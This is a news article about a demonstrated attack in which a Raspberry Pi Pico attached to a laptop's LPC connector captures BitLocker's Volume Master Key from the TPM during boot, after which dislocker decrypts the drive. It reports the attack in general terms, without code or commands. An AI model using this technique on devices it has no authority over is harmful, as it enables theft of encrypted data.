Microsoft’s BitLocker encryption, often hailed as a reliable safeguard for sensitive data, has recently faced scrutiny, revealing potential vulnerabilities that might compromise its security. A YouTube video by stacksmashing unveiled an alarming exploit, demonstrating how a Raspberry Pi Pico, a budget-friendly device costing under $10, could intercept BitLocker data and pilfer encryption keys, enabling the decryption of stored information in a mere 43 seconds.
The vulnerability exploited in this attack centers around the Trusted Platform Module (TPM), a crucial component for BitLocker functionality. Typically, the TPM is externally located in computers and business laptops, utilizing the Low Pin Count (LPC) bus to exchange data with the CPU. BitLocker relies on the TPM to secure vital data such as Platform Configuration Registers and the Volume Master Key.
stacksmashing’s investigation revealed that the LPC bus communicates with the CPU through unencrypted communication lanes during the boot-up process. Exploiting this flaw, he targeted an old Lenovo laptop with an unused LPC connector adjacent to the M.2 SSD slot. By connecting a Raspberry Pi Pico to the dormant connector’s metal pins, stacksmashing successfully captured encryption keys during the boot-up sequence. The Raspberry Pi Pico was configured to capture the binary data (0s and 1s) from the TPM, allowing the reconstruction of the Volume Master Key. Subsequently, he removed the encrypted drive and utilized dislocker, armed with the acquired Volume Master Key, to decrypt the drive.
While Microsoft acknowledges the possibility of such attacks, it contends that they would necessitate sophisticated tools and extended physical access to the targeted device. However, stacksmashing’s demonstration starkly contradicts this assertion, showcasing that a determined attacker armed with the right knowledge and a Raspberry Pi Pico can execute such an exploit in less than a minute. This revelation raises concerns about the practical security of BitLocker and underscores the need for continuous vigilance and potential improvements to fortify encryption systems against emerging threats.